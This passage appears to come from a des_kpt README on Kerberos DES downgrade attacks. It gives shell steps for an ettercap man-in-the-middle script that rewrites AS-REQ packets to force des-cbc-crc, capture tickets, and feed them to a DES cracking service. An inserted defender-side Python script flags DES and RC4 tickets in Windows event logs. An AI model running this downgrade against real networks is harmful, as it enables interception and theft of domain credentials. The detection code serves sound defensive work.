Kerberos5 DES
There are still many legacy Windows and Linux environments that support RC4 and DES for Kerberos. Especially on corporate networks with older production machines or software, it is surprisingly common to find these encryption types still in use today. The best way to check whether DES is allowed on a Windows machine is to inspect the SupportedEncryptionTypes setting.
Capturing
Most of the time, even though DES is supported, it typically isn't the first option that gets used. To force clients to downgrade to DES so we can capture ciphertext, we put together a simple ettercap filter in our des_kpt repo that can be used:
$ cd krb5_ettercap
$ vi krb5-downgrade-asreq.sh
...
export KDC="192.168.1.11"
export TARGET="192.168.1.27"
export ETH="enp0s3"
...
$ ./krb5-downgrade-asreq.sh
This puts us in the middle of the connection between the KDC and TARGET and replaces the supported encryption types in all of the TARGET -> KDC AS-REQ packets with des-cbc-crc. This should downgrade all encrypted communication (TGS, Authenticators, etc.) to des-cbc-crc and log it to /tmp/ettercap.pcap, which you can then crack using des_kpt.
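A defender-side counterpart to the downgrade described above, added here as an example and not part of the des_kpt tooling: it scans simplified Windows 4768/4769 event lines for DES or RC4 ticket encryption types and flags a DES ticket issued to an account whose msDS-SupportedEncryptionTypes flags permit AES as a likely downgrade. The log line format, account names, flag values and addresses are constructed; the etype numbers and bit flags are those defined in RFC 3961 and MS-KILE.

```python
import re

# Ticket etype numbers as logged in the "Ticket Encryption Type" field of
# Windows security events 4768 (TGT request) and 4769 (service ticket).
ETYPE_NAMES = {0x1: "des-cbc-crc", 0x3: "des-cbc-md5",
               0x11: "aes128-cts", 0x12: "aes256-cts", 0x17: "rc4-hmac"}
DES_ETYPES = {0x1, 0x3}
# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7): 0x1 DES-CBC-CRC,
# 0x2 DES-CBC-MD5, 0x4 RC4-HMAC, 0x8 AES128, 0x10 AES256.
AES_FLAGS = 0x8 | 0x10

# Constructed sample event lines, reduced to the fields this check needs.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc-legacy ClientAddress=192.168.1.27 TicketEncryptionType=0x1
EventID=4768 TargetUserName=alice ClientAddress=192.168.1.27 TicketEncryptionType=0x1
EventID=4768 TargetUserName=alice ClientAddress=192.168.1.40 TicketEncryptionType=0x12
EventID=4769 TargetUserName=bob ClientAddress=192.168.1.41 TicketEncryptionType=0x17
"""
# Constructed msDS-SupportedEncryptionTypes values for those accounts.
ACCOUNT_ETYPES = {"svc-legacy": 0x3, "alice": 0x18, "bob": 0x1c}

EVENT_RE = re.compile(r"EventID=(\d+) TargetUserName=(\S+) "
                      r"ClientAddress=(\S+) TicketEncryptionType=0x([0-9a-fA-F]+)")

def parse_event(line):
    """Return the fields of one event line, or None if it does not match."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    return {"id": int(m.group(1)), "user": m.group(2),
            "client": m.group(3), "etype": int(m.group(4), 16)}

def assess(event, supported):
    """'downgrade' if a DES ticket went to an AES-capable account,
    'weak' for any other DES or RC4 ticket, otherwise 'ok'."""
    etype = event["etype"]
    if etype in DES_ETYPES and supported & AES_FLAGS:
        return "downgrade"
    if etype in DES_ETYPES or etype == 0x17:
        return "weak"
    return "ok"

def find_weak_tickets(log_text, account_etypes):
    """Accounts missing from account_etypes are treated as 0 (unset)."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        verdict = assess(ev, account_etypes.get(ev["user"], 0))
        if verdict != "ok":
            name = ETYPE_NAMES.get(ev["etype"], hex(ev["etype"]))
            findings.append((ev["user"], ev["client"], name, verdict))
    return findings

if __name__ == "__main__":
    for f in find_weak_tickets(SAMPLE_EVENTS, ACCOUNT_ETYPES):
        print("%-12s from %-14s got %-12s -> %s" % f)
```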
Submission
Now that we have a capture, we can run des_kpt to generate submission tokens for any known-plaintext data in the packet capture.
$ cd ..
$ ./des_kpt.py kerb -i /tmp/ettercap.pcap
Using the Result
There currently aren't any tools for using the cracked DES keys to log in to machines, but we're looking into the best ways to use the keys to authenticate with machines and for further exploitation.